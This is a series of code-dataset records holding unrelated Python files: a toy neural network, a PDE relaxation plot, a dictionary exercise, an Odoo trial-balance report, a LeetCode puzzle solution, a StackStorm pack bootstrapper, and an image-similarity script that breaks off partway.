lossfn, actfn, actfnp) -> None:\n network = []\n L = len(structure) - 1\n for l in range(len(structure)):\n this_layer_num_neurons = structure[l]\n layer = [Neuron() for _ in range(this_layer_num_neurons)]\n for neuron in layer: neuron.layer = l\n\n network.append(layer)\n\n for l in range(len(network) - 1):\n this_layer = network[l]\n next_layer = network[l + 1]\n for this_neuron in this_layer:\n for next_neuron in next_layer:\n this_neuron.connect(next_neuron)\n\n self.network = network\n self.lossfn = lossfn\n self.actfn = actfn\n self.actfnp = actfnp\n\n def __repr__(self) -> str:\n return str(self) + \"\\n\"\n\n def __str__(self) -> str:\n result = \"\"\n for layer in self.network:\n result += \"\\n\" + str(layer) + \"\\n\"\n return result\n\n def get_total_error(self, dataset):\n error = 0.0\n for data in dataset:\n input = data[INPUT_INDEX]\n expected = data[OUTPUT_INDEX]\n actual = self.forward_propagate(input)\n for i in range(len(actual)):\n error += abs(self.lossfn(a=actual[i], e=expected[i]))\n error /= (1.0 * len(dataset))\n return error\n\n def serialize(self) -> str:\n return [[x.serialize() for x in layer] for layer in self.network]\n\n def deserialize(self, serialized_network):\n if serialized_network is None:\n raise Exception(\"No serialized data avaialble\")\n \n deserialized = serialized_network\n \n for l in range(len(deserialized)):\n layer = deserialized[l]\n for n in range(len(layer)):\n neuron = layer[n]\n self.network[l][n].deserialize(neuron)\n\n return self\n\n def train(self, dataset, max_epochs, learn_rate, precision):\n for epoch in tqdm(range(max_epochs)):\n for i in range(len(dataset)):\n inputs = dataset[i][INPUT_INDEX]\n expected = 
dataset[i][OUTPUT_INDEX]\n self.forward_propagate(inputs)\n self.backpropagate(expected, learn_rate)\n\n total_error = self.get_total_error(dataset)\n\n if (epoch % (max_epochs // 10)) == 0:\n learn_rate /= 1.05\n\n if abs(total_error) <= abs(precision):\n return\n\n return\n\n def run(self, dataset):\n results = []\n for i in range(len(dataset)):\n if type(dataset[i]) == list:\n inputs = dataset[i][0]\n elif type(dataset[i]) == dict:\n inputs = dataset[i][\"input\"]\n results.append(self.forward_propagate(inputs))\n return results\n\n def build_file_name(self, prefix, filetype=\".json\"):\n structure = \"x\".join([str(len(l)) for l in self.network])\n return prefix + \"-\" + structure + filetype\n\n def write_to_file(self, prefix):\n return write_json(self.serialize(), file=self.build_file_name(prefix=prefix))\n\n def load_from_file(self, prefix):\n network_file = self.build_file_name(prefix)\n serialized_network = read_json(network_file)\n if serialized_network is not None:\n self.deserialize(serialized_network)\n else:\n print(network_file + \" not found, creating file...\")\n return\n\n def forward_propagate(self, inputs):\n if len(inputs) != len(self.network[0]):\n raise Exception(\"Input length does not match input layer\")\n \n # set all neuron outputs to 0.0\n for layer in self.network:\n for neuron in layer:\n neuron.actsum = 0.0\n neuron.output = 0.0\n\n # set input layer neuron outputs to the inputs\n for i in range(len(inputs)):\n self.network[0][i].output = inputs[i]\n\n # loop through all but the output layer propagating input\n for l in range(len(self.network) - 1):\n layer = self.network[l]\n next_layer = self.network[l + 1]\n \n # if it's not the last hidden layer multiply weight by output\n for neuron in layer:\n for weight in neuron.weights:\n weight.output_neuron.actsum += weight.value * neuron.output\n\n # apply activation function to all neuron outputs\n for neuron in next_layer:\n neuron.actsum += neuron.bias\n neuron.output = self.actfn(neuron.actsum)\n\n return [x.output for x in self.network[-1]]\n\n # network, expected output, loss function, derivative of activation function\n def backpropagate(self, expected, learn_rate):\n output_layer = self.network[-1]\n\n for i in range(len(output_layer)):\n neuron = output_layer[i]\n gradient = self.lossfn(a=neuron.output, e=expected[i]) * self.actfnp(neuron.actsum)\n neuron.gradient = gradient\n self.backpropagate_hidden(neuron, learn_rate)\n\n # L is the same layer that source neuron is in\n def backpropagate_hidden(self, source, learn_rate):\n if source is None or source.layer < 1:\n return\n \n layer = self.network[source.layer - 1]\n for neuron in layer:\n new_gradient = 0.0\n for weight in neuron.weights:\n if weight.output_neuron == source:\n gradient_wrt_w = weight.value * source.gradient * self.actfnp(neuron.actsum)\n new_gradient += gradient_wrt_w\n weight_delta = learn_rate * source.gradient * neuron.output\n weight.value += weight_delta\n bias_delta = -learn_rate * source.gradient\n neuron.bias += bias_delta\n neuron.gradient = new_gradient\n self.backpropagate_hidden(neuron, learn_rate)\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"321487711","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 10 11:41:42 2019\n\n@author: thevexis\n\nProject\nPartial Differential Equations \n\"\"\"\n\n\nimport matplotlib.pylab as p;\nfrom mpl_toolkits.mplot3d import 
Axes3D\nfrom numpy import *;\nimport numpy;\n\nprint(\"Initializing\")\nNmax = 50; Niter = 70; V=zeros((Nmax,Nmax),float)\n\nfor k in range(0,Nmax-1): V[0,k]=100\nfor iter in range(Niter):\n if iter%10 == 0: print(iter)\n for i in range(1,Nmax-2):\n for j in range(1,Nmax-2):\n V[i,j]=0.25*(V[i+1,j]+V[i-1,j]+V[i,j+1]+V[i,j-1])\nx = range(0,Nmax-1,2); y=range(0,50,2)\nX, Y = p.meshgrid(x,y)\n\ndef functz(V):\n z = V[X,Y]\n return z\n\nZ = functz(V)\nfig = p.figure()\nax = Axes3D(fig)\nax.plot_wireframe(X,Y,Z, color='r')\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Potential')\np.show()\n","sub_path":"Project/Example.py","file_name":"Example.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"465382598","text":"# Creating a new dictionary\n# new_dict = dict() # {}\n\n#country_1 = {'name': 'Thailand', 'sea': True}\n#country_2 = {'name': 'Hungary', 'sea': False}\n\n# Approach 1 - lists\n#countries = [\n\t#{'name': 'Thailand', 'sea': True, 'schengen': False, 'average_temperature': 30, 'currency_rate': 1.8},\n\t#{'name': 'Hungary', 'sea': False, 'schengen': True, 'average_temperature': 10, 'currency_rate': 0.3},\n\t#{'name': 'Germany', 'sea': True, 'schengen': True, 'average_temperature': 5, 'currency_rate': 80},\n\t#{'name': 'Japan', 'sea': True, 'schengen': False, 'average_temperature': 15, 'currency_rate': 0.61}\n\t#]\n\n# Approach 2 - dictionary\ncountries = {\n\t#'Cuba': data_about_Cuba,\n\t'Thailand': {'sea': True, \n\t\t\t\t'schengen': False, \n\t\t\t\t'average_temperature': 30, \n\t\t\t\t'currency_rate': 1.8},\n\t'Hungary': {'sea': False, \n\t\t\t\t'schengen': True, \n\t\t\t\t'average_temperature': 10, \n\t\t\t\t'currency_rate': 0.3},\n\t'Germany': {'sea': True, \n\t\t\t\t'schengen': True, \n\t\t\t\t'average_temperature': 5, \n\t\t\t\t'currency_rate': 80},\n\t'Japan': {'sea': True, \n\t\t\t\t'schengen': False, \n\t\t\t\t'average_temperature': 15, \n\t\t\t\t'currency_rate': 0.61},\n\t}\n# How to fill a dictionary\n# d = dict()\n# d['name'] = 'Thailand'\n\n# Sets are a convenient structure for intersection and union operations, and they guarantee element uniqueness\n# Unlike lists, the elements of a set are unordered\nschengen_countries = set()\nsea_countries = set()\n\nfor country_name, properties in countries.items():\n\tif properties['schengen']:\n\t\tschengen_countries.add(country_name)\n\tif properties['sea']:\n\t\tsea_countries.add(country_name)\n\nprint (sea_countries)\nprint (schengen_countries)\n#print ('Countries in Schengen and with a sea: ', schengen_countries & sea_countries)\n\n\n# Output formatting\n#money_amount = 10000\n#for country in countries:\n#\tcurrency_amount = money_amount / country['currency_rate']\n#\tprint('We will have %.3f of money in local currency' % currency_amount)\n\n\nsea_schengen_countries = schengen_countries & sea_countries\n\n# Approach with a list of dictionaries\n#for country_name in sea_schengen_countries:\n#\tfor country in countries:\n#\t\tif country['name'] == country_name:\n#\t\t\tprint(country)\n#\t\t\tbreak\n\n# Approach with a dictionary of dictionaries\nfor country_name in sea_schengen_countries:\n\tprint(\"Schengen countries with a sea\", country_name, countries[country_name])\n","sub_path":"home work dict.py","file_name":"home work dict.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
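# A compact alternative to the two accumulation loops above (a separate
# sketch, not part of the homework file): set comprehensions over the same
# kind of dict. The tiny sample dict and the names below are ours.
countries_sample = {'Thailand': {'sea': True, 'schengen': False},
                    'Hungary': {'sea': False, 'schengen': True},
                    'Germany': {'sea': True, 'schengen': True}}
schengen = {name for name, props in countries_sample.items() if props['schengen']}
sea = {name for name, props in countries_sample.items() if props['sea']}
print('Schengen countries with a sea:', schengen & sea)  # -> {'Germany'}
+{"seq_id":"384206409","text":"import os\n\nfrom odoo import api, fields, models, 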
_\nfrom odoo.exceptions import UserError\nfrom odoo.modules import get_module_path\nfrom datetime import datetime\nimport json\n\n\nclass WizardTrialBalance(models.TransientModel):\n _inherit = 'wizard.kg.report.general.ledger'\n _name = 'wizard.kg.report.trial.balance'\n _title = \"KG Report - Trial Balance\"\n\n # sortby = fields.Selection([('sort_date', 'Date'), ('sort_journal_partner', 'Journal & Partner')], string='Sort by',\n # required=True, default='sort_date')\n # journal_ids = fields.Many2many('account.journal', string='Journals', required=True,\n # # default=lambda self: self.env['account.journal'].search([])\n # )\n # display_account = fields.Selection([('all', 'All'), ('movement', 'With movements'),\n # ('not_zero', 'With balance is not equal to 0'), ],\n # string='Display Accounts', required=True, default='movement')\n # date_from = fields.Date(string='Start Date')\n # date_to = fields.Date(string='End Date')\n # target_move = fields.Selection([('posted', 'All Posted Entries'),\n # ('all', 'All Entries'),\n # ], string='Target Moves', required=True, default='posted')\n # report_type = fields.Selection([('sum', 'Summary'), ('det', 'Details'), ], 'Report Type',\n # required=True, default='det')\n\n @api.multi\n def _get_data(self):\n\n self.report_has_logo = True # sample report has logo\n current_company = self.get_param()\n\n res = self.get_report_values(current_company)\n\n return {\n \"data1\": res\n }\n\n def get_report_values(self, current_company=None):\n\n cr = self.env.cr\n\n sql_sort, where_date, where_state, where_display, \\\n init_date, init_balance = self.query_get_clause()\n\n query = \"\"\"\n WITH z_kg_trial_balance_beg_balance AS (\n SELECT l.account_id AS account_id, COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) AS beg_balance\n FROM account_move_line l\n LEFT JOIN account_move m ON (l.move_id=m.id) \n WHERE l.date < %s \n and l.company_id = %s \n \"\"\" + where_state + \"\"\" \n GROUP BY l.account_id\n ),\n z_kg_move_line as (\n SELECT l.account_id , \n COALESCE(SUM(l.debit),0) AS debit, \n COALESCE(SUM(l.credit),0) AS credit, \n COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) AS balance\n FROM account_move_line l \n LEFT JOIN account_move m ON (l.move_id=m.id) \n LEFT JOIN account_journal j ON (l.journal_id=j.id) \n where l.company_id = %s \n \"\"\" + where_date + \"\"\"\n \"\"\" + where_state + \"\"\" \n GROUP by l.account_id\n )\n SELECT acc.\"name\" as acc_name, \n acc.code as acc_code, \n COALESCE(z.beg_balance,0) AS beg_balance, \n COALESCE(l.debit,0) AS debit, \n COALESCE(l.credit,0) AS credit, \n COALESCE(l.debit,0) - COALESCE((l.credit), 0) AS balance\n FROM account_account acc\n LEFT JOIN z_kg_trial_balance_beg_balance z on (acc.id = z.account_id)\n LEFT JOIN z_kg_move_line l ON (l.account_id = acc.id) \n WHERE acc.company_id = %s \n \"\"\" + where_display + \"\"\" \n ORDER BY acc.code \n\n \"\"\"\n params = (init_date, current_company.id, current_company.id, current_company.id)\n self._cr.execute(query, params)\n data = cr.dictfetchall()\n\n return data\n\n def query_get_clause(self):\n\n sql_sort = \"acc.code\"\n # if self.sortby == 'sort_date' and self.report_type == 'det':\n # sql_sort = \"acc.code\"\n # elif self.sortby == 'sort_journal_partner' and self.report_type == 'sum':\n # sql_sort = \"acc.code\"\n # elif self.sortby == 'sort_journal_partner':\n # sql_sort = \"acc.code\"\n\n where_date = \"\"\n init_balance = False # self.initial_balance\n # if init_balance and not start_date:\n # raise UserError(_(\"You must define a Start 
Date\"))\n\n if self.date_from:\n where_date += \"AND l.date >= '\" + self.date_from + \"' \"\n init_date = self.date_from\n else:\n init_date = '1900-01-01'\n\n if self.date_to:\n where_date += \"AND l.date <= '\" + self.date_to + \"' \"\n\n where_state = \"AND m.state = 'posted' \"\n if self.target_move == 'all':\n where_state = \"\"\n\n where_display = \"and (COALESCE(l.debit,0) > 0 or COALESCE(l.credit, 0) > 0 or COALESCE(z.beg_balance,0) != 0)\"\n # having_display = \"\"\n # if self.display_account == 'not_zero':\n # having_display = \"\"\n # elif self.display_account == 'all':\n # where_display = \"\"\n # having_display = \"\"\n\n return sql_sort, where_date, where_state, \\\n where_display, init_date, init_balance\n\n def get_param(self):\n current_user = self.env['res.users'].browse(self.env.context.get('uid', False))\n current_company = current_user.company_id\n\n return current_company\n\n def _define_report_name(self):\n # if self.report_type == \"det\":\n # rpt = \"/kg_account/static/rpt/TrialBalanceSummary.mrt\"\n # else:\n rpt = \"/kg_account/static/rpt/TrialBalanceSummary.mrt\"\n\n return rpt\n\n def _define_report_variables(self):\n variables = list()\n\n current_company = self.get_param()\n\n variables.append(KgReportVariable(\n key=\"StartDate\", # variable name in report\n value=self.date_from if self.date_from else '',\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"EndDate\", # variable name in report\n value=self.date_to if self.date_to else '',\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Display\", # variable name in report\n value=dict(self._fields['display_account'].selection).get(self.display_account),\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Sort\", # variable name in report\n value=dict(self._fields['sortby'].selection).get(self.sortby),\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Target\", # variable name in report\n value=dict(self._fields['target_move'].selection).get(self.target_move),\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"UserPrint\", # variable name in report\n value=self.env.user.name,\n ).to_dict())\n\n variables.append(KgReportVariable(\n key=\"Company\", # variable name in report\n value=current_company.name,\n ).to_dict())\n\n return variables\n\n\nclass KgReportVariable(object):\n\n def __init__(self, key, value, is_image=False, format_value=\"url\"):\n self.key = key\n self.value = value\n self.is_image = is_image\n self.format_value = format_value # this is format value for image (str or url path)\n\n def to_dict(self):\n return {\n \"key\": self.key,\n \"value\": self.value,\n \"is_image\": self.is_image,\n \"format_value\": self.format_value\n }\n","sub_path":"local/kg_account/wizards/wizard_kg_report_trial_balance.py","file_name":"wizard_kg_report_trial_balance.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"616424901","text":"#\n# @lc app=leetcode.cn id=1178 lang=python3\n#\n# [1178] 猜字谜\n#\nfrom functools import lru_cache\nfrom test.test_threading import Counter\nfrom typing import List\n\n\n# @lc code=start\nclass Solution:\n A = ord('a')\n\n @classmethod\n @lru_cache\n def _c_mask(cls, c: str):\n \"\"\"\n 返回指定字符的二进制标识位\n 例如 'a' 为 '1','b' 为 '10', 'c' 为 '100' 等\n \"\"\"\n return 1 << (ord(c) - cls.A)\n\n def findNumOfValidWords(self, words: List[str], puzzles: List[str]) -> List[int]:\n \"\"\"\n Args:\n words(List[str]): 输入的词列表\n puzzles(List[str]): 
字谜的谜面列表\n\n Returns:\n List[int]: 转置后的矩阵\n \"\"\"\n\n freq = Counter()\n \n for w in words:\n mask = 0\n\n # 计算一个单词的二进制掩码\n for c in w:\n mask |= self._c_mask(c)\n\n if str(bin(mask)).count('1') <= 7:\n freq[mask] += 1\n\n res = []\n for puzzle in puzzles:\n total = 0\n\n mask = 0\n for i in range(1, 7):\n mask |= self._c_mask(puzzle[i])\n\n subset = mask\n while subset:\n s = subset | self._c_mask(puzzle[0])\n if s in freq:\n total += freq[s]\n\n subset = (subset - 1) & mask\n\n # 在枚举子集的过程中,要么会漏掉全集 mask,要么会漏掉空集\n # 这里会漏掉空集,因此需要额外判断空集\n if self._c_mask(puzzle[0]) in freq:\n total += freq[self._c_mask(puzzle[0])]\n\n res.append(total)\n\n return res\n# @lc code=end\n\n","sub_path":"1178.猜字谜.py","file_name":"1178.猜字谜.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"534227584","text":"# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nimport shutil\nimport argparse\nimport logging\nimport logging.config\n\nimport six\nimport cmd2\nfrom cmd2 import Cmd\nfrom jinja2 import Environment, FileSystemLoader\n\n__all__ = [\n 'SDKApp'\n]\n\nLOG = logging.getLogger(__name__)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nTEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')\nLICENSE_PATH = os.path.abspath(os.path.join(TEMPLATES_DIR, 'LICENSE'))\n\nCOMMAND_HELP = {\n 'bootstrap': [\n 'bootstrap [pack name]',\n 'Create initial directory structure for the provided pack.'\n ]\n}\n\nDIRECTORY_STRUCTURE = [\n 'sensors/',\n 'actions/',\n]\n\nFILE_TEMPLATES = [\n {\n 'name': 'README.md',\n 'path': 'README.md'\n },\n {\n 'name': 'pack.yaml',\n 'path': 'pack.yaml'\n },\n {\n 'name': 'config.yaml',\n 'path': 'config.yaml'\n }\n]\n\n\nbootstrap_parser = argparse.ArgumentParser()\nbootstrap_parser.add_argument('pack_name', help='Pack name')\nbootstrap_parser.add_argument('-i', '--interactive',\n action='store_true',\n default=False,\n help='Run in an interactive mode')\nbootstrap_parser.add_argument('-l', '--add-license',\n action='store_true',\n default=False,\n help='Copy Apache 2.0 LICENSE file to the pack directory')\n\n\nclass SDKApp(Cmd):\n into = 'Welcome to st2sdk'\n prompt = '(st2sdk): '\n\n @cmd2.with_argparser(bootstrap_parser)\n def do_bootstrap(self, args):\n pack_name = args.pack_name\n add_license = args.add_license\n self._setup_logging()\n\n if args.interactive:\n data = self._gather_input(pack_name=pack_name)\n else:\n data = {\n 'pack_name': pack_name,\n 'author_name': 'John Doe',\n 'author_email': 'john.doe@example.com'\n }\n\n if not data['pack_name']:\n raise ValueError('Pack name is required')\n\n self._handle_bootstrap(data=data, add_license=add_license)\n\n def help_bootstrap(self):\n help_string = COMMAND_HELP['bootstrap']\n help_string = 
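# A worked run (a separate sketch, not part of the record above) of the
# `(subset - 1) & mask` trick used in findNumOfValidWords: for mask = 0b101
# it visits every non-empty sub-mask in decreasing order and stops at 0,
# which is why the empty subset needs the extra check noted above.
mask = 0b101
subset, seen = mask, []
while subset:
    seen.append(bin(subset))
    subset = (subset - 1) & mask
assert seen == ['0b101', '0b100', '0b1']
+{"seq_id":"534227584","text":"# Licensed to the StackStorm, Inc ('StackStorm') under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nimport shutil\nimport argparse\nimport logging\nimport logging.config\n\nimport six\nimport cmd2\nfrom cmd2 import Cmd\nfrom jinja2 import Environment, FileSystemLoader\n\n__all__ = [\n 'SDKApp'\n]\n\nLOG = logging.getLogger(__name__)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nTEMPLATES_DIR = os.path.join(BASE_DIR, 'templates')\nLICENSE_PATH = os.path.abspath(os.path.join(TEMPLATES_DIR, 'LICENSE'))\n\nCOMMAND_HELP = {\n 'bootstrap': [\n 'bootstrap [pack name]',\n 'Create initial directory structure for the provided pack.'\n ]\n}\n\nDIRECTORY_STRUCTURE = [\n 'sensors/',\n 'actions/',\n]\n\nFILE_TEMPLATES = [\n {\n 'name': 'README.md',\n 'path': 'README.md'\n },\n {\n 'name': 'pack.yaml',\n 'path': 'pack.yaml'\n },\n {\n 'name': 'config.yaml',\n 'path': 'config.yaml'\n }\n]\n\n\nbootstrap_parser = argparse.ArgumentParser()\nbootstrap_parser.add_argument('pack_name', help='Pack name')\nbootstrap_parser.add_argument('-i', '--interactive',\n action='store_true',\n default=False,\n help='Run in an interactive mode')\nbootstrap_parser.add_argument('-l', '--add-license',\n action='store_true',\n default=False,\n help='Copy Apache 2.0 LICENSE file to the pack directory')\n\n\nclass SDKApp(Cmd):\n intro = 'Welcome to st2sdk'\n prompt = '(st2sdk): '\n\n @cmd2.with_argparser(bootstrap_parser)\n def do_bootstrap(self, args):\n pack_name = args.pack_name\n add_license = args.add_license\n self._setup_logging()\n\n if args.interactive:\n data = self._gather_input(pack_name=pack_name)\n else:\n data = {\n 'pack_name': pack_name,\n 'author_name': 'John Doe',\n 'author_email': 'john.doe@example.com'\n }\n\n if not data['pack_name']:\n raise ValueError('Pack name is required')\n\n self._handle_bootstrap(data=data, add_license=add_license)\n\n def help_bootstrap(self):\n help_string = COMMAND_HELP['bootstrap']\n help_string = 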
'\\n'.join(help_string)\n print(help_string)\n\n def _gather_input(self, pack_name=None):\n \"\"\"\n :rtype: ``dict``\n \"\"\"\n if not pack_name:\n pack_name = six.moves.input('Pack name: ')\n\n author_name = six.moves.input('Author name: ')\n author_email = six.moves.input('Author email: ')\n\n data = {\n 'pack_name': pack_name,\n 'author_name': author_name,\n 'author_email': author_email\n }\n return data\n\n def _get_template_context(self):\n \"\"\"\n :rtype: ``dict``\n \"\"\"\n context = {}\n return context\n\n def _handle_bootstrap(self, data, add_license=False):\n cwd = os.getcwd()\n pack_name = data['pack_name']\n pack_path = os.path.join(cwd, pack_name)\n\n if os.path.isdir(pack_path):\n raise ValueError('Pack directory \"%s\" already exists' %\n (pack_path))\n\n # 1. Create directory structure\n pack_path = self._create_directory_structure(pack_path=pack_path)\n\n # 2. Copy over and render the file templates\n context = data\n self._render_and_write_templates(pack_path=pack_path, context=context)\n\n # 3. Copy over license file (if specified)\n if add_license:\n shutil.copyfile(LICENSE_PATH, os.path.join(pack_path, 'LICENSE'))\n\n LOG.info('Pack \"%s\" created in %s' % (pack_name, pack_path))\n\n def _create_directory_structure(self, pack_path):\n LOG.debug('Creating directory: %s' % (pack_path))\n os.makedirs(pack_path)\n\n for directory in DIRECTORY_STRUCTURE:\n full_path = os.path.join(pack_path, directory)\n LOG.debug('Creating directory: %s' % (full_path))\n os.makedirs(full_path)\n\n return pack_path\n\n def _render_and_write_templates(self, pack_path, context):\n \"\"\"\n :param context: Template render context.\n :type context: ``dict``\n \"\"\"\n env = Environment(loader=FileSystemLoader(TEMPLATES_DIR))\n\n for template_dict in FILE_TEMPLATES:\n template_name = template_dict['name']\n render_path = template_dict['path']\n\n template = env.get_template(template_name)\n rendered = template.render(**context)\n\n full_render_path = os.path.join(pack_path, render_path)\n with open(full_render_path, 'w') as fp:\n LOG.debug('Writing template file: %s' % (full_render_path))\n fp.write(rendered)\n\n def _setup_logging(self):\n logging_config = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n 'format': '%(asctime)s %(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n '()': logging.StreamHandler,\n 'formatter': 'default'\n }\n },\n 'root': {\n 'handlers': ['console'],\n 'level': 'INFO',\n },\n }\n logging.config.dictConfig(logging_config)\n","sub_path":"st2sdk/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"170176858","text":"from image_features.colormoments import ColorMoment\nfrom image_features.HOG import HOG\nfrom image_features.SIFT import SIFT\nfrom image_features.FeatureModel import *\nfrom utils.cli_options import *\nfrom utils.distance_measures import *\nfrom utils.similarity_measures import *\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import TruncatedSVD\nimport matplotlib.pyplot as plt\nimport cv2 as cv\nfrom math import ceil\nimport os\nimport pagerank as pagerank\nimport scipy.sparse as sparse\nimport pandas as pd\nimport csv\nfrom image_features.LBP import LBP\nimport cvxopt\nimport cvxopt.solvers\nfrom cvxopt import matrix as cvxopt_matrix\nfrom cvxopt import solvers as cvxopt_solvers\nimport task5 as lsh\n\nCURRENT_DIR = 
os.path.dirname(__file__)\nOUTPUT_DIR = os.path.join(CURRENT_DIR, '..' + os.sep, 'Outputs', 'Task_4')\n\n\nclass ImageSimilarity:\n def __init__(self, image_id, similarity):\n self.image_id = image_id\n self.similarity = similarity\n\n\nclass Node:\n def __init__(self, gini, num_samples, num_samples_per_class, predicted_class):\n self.gini = gini\n self.num_samples = num_samples\n self.num_samples_per_class = num_samples_per_class\n self.predicted_class = predicted_class\n self.feature_index = 0\n self.threshold = 0\n self.left = None\n self.right = None\n\n\nclass DecisionTreeClassifier:\n def __init__(self, max_depth = None):\n self.max_depth = max_depth\n\n def _best_split(self, X, y):\n # Need at least two elements to split a node.\n m = y.size\n if m <= 1:\n return None, None\n\n # Count of each class in the current node.\n num_parent = [np.sum(y == c) for c in range(self.n_classes_)]\n\n # Gini of current node.\n best_gini = 1.0 - sum((n / m) ** 2 for n in num_parent)\n best_idx, best_thr = None, None\n\n # Loop through all features.\n for idx in range(self.n_features_):\n # Sort data along selected feature.\n thresholds, classes = zip(*sorted(zip(X[:, idx], y)))\n\n # We could actually split the node according to each feature/threshold pair\n # and count the resulting population for each class in the children, but\n # instead we compute them in an iterative fashion, making this for loop\n # linear rather than quadratic.\n num_left = [0] * self.n_classes_\n num_right = num_parent.copy()\n for i in range(1, m): # possible split positions\n c = classes[i - 1]\n num_left[c] += 1\n num_right[c] -= 1\n gini_left = 1.0 - sum(\n (num_left[x] / i) ** 2 for x in range(self.n_classes_)\n )\n gini_right = 1.0 - sum(\n (num_right[x] / (m - i)) ** 2 for x in range(self.n_classes_)\n )\n\n # The Gini impurity of a split is the weighted average of the Gini\n # impurity of the children.\n gini = (i * gini_left + (m - i) * gini_right) / m\n\n # The following condition is to make sure we don't try to split two\n # points with identical values for that feature, as it is impossible\n # (both have to end up on the same side of a split).\n if thresholds[i] == thresholds[i - 1]:\n continue\n\n if gini < best_gini:\n best_gini = gini\n best_idx = idx\n best_thr = (thresholds[i] + thresholds[i - 1]) / 2 # midpoint\n\n return best_idx, best_thr\n\n def fit(self, X, y):\n \"\"\"Build decision tree classifier.\"\"\"\n self.n_classes_ = len(set(y)) # classes are assumed to go from 0 to n-1\n self.n_features_ = X.shape[1]\n self.tree_ = self._grow_tree(X, y)\n\n def _grow_tree(self, X, y, depth = 0):\n \"\"\"Build a decision tree by recursively finding the best split.\"\"\"\n # Population for each class in current node. 
The predicted class is the one with\n # largest population.\n num_samples_per_class = [np.sum(y == i) for i in range(self.n_classes_)]\n predicted_class = np.argmax(num_samples_per_class)\n node = Node(\n gini = self._gini(y),\n num_samples = y.size,\n num_samples_per_class = num_samples_per_class,\n predicted_class = predicted_class,\n )\n\n # Split recursively until maximum depth is reached.\n if depth < self.max_depth:\n idx, thr = self._best_split(X, y)\n if idx is not None:\n indices_left = X[:, idx] < thr\n X_left, y_left = X[indices_left], y[indices_left]\n X_right, y_right = X[~indices_left], y[~indices_left]\n node.feature_index = idx\n node.threshold = thr\n node.left = self._grow_tree(X_left, y_left, depth + 1)\n node.right = self._grow_tree(X_right, y_right, depth + 1)\n return node\n\n def predict(self, X):\n return [self._predict(inputs) for inputs in X]\n\n def _predict(self, inputs):\n \"\"\"Predict class for a single sample.\"\"\"\n node = self.tree_\n while node.left:\n if inputs[node.feature_index] < node.threshold:\n node = node.left\n else:\n node = node.right\n return node.predicted_class\n\n def _gini(self, y):\n m = y.size\n return 1.0 - sum((np.sum(y == c) / m) ** 2 for c in range(self.n_classes_))\n\n\ndef dimension_reduction(X, k, selected_model, dim_reduction_tech, input_images):\n model = get_feature_model(selected_model)\n dim_reduction_model = get_dim_reduction_tech(dim_reduction_tech)\n\n # HOG (ideal = 73%, edges = 12, dim = 50, data set 2->2)\n # top_dim = 50\n # CM (ideal = 72%, edges = 12, dim = 20, data set 2->2)\n # data set 2 -> 1 = 80%\n # data set 1 -> 2 = 48%\n top_dim = 20\n\n # PCA\n if dim_reduction_tech == \"1\":\n pca = PCA(n_components = top_dim)\n U, _, V = pca._fit(X)\n latent_features = U[:, :top_dim]\n\n # SVD\n elif dim_reduction_tech == \"2\":\n # U, _, V = np.linalg.svd(X)\n svd = TruncatedSVD(n_components=top_dim)\n U = svd.fit_transform(np.array(X))\n latent_features = U[:, :top_dim]\n\n # STORE THE SIMILARITY DICT IN H5py or pickle object beforehand\n # Find the similarity\n similarity_dict = {}\n lf_len = len(latent_features)\n # input_images += training_input_images\n\n for i in range(lf_len):\n for j in range(lf_len):\n if i == j:\n continue\n\n dist = euclidean_distance(list(latent_features[i]), list(latent_features[j]))\n sim = round((1 / (dist+1)), 4)\n # sim = cosine_similarity(list(latent_features[i]), list(latent_features[j]))\n img_sim = ImageSimilarity(input_images[j].image_id, sim)\n\n if input_images[i].image_id not in similarity_dict:\n similarity_dict[input_images[i].image_id] = [img_sim]\n 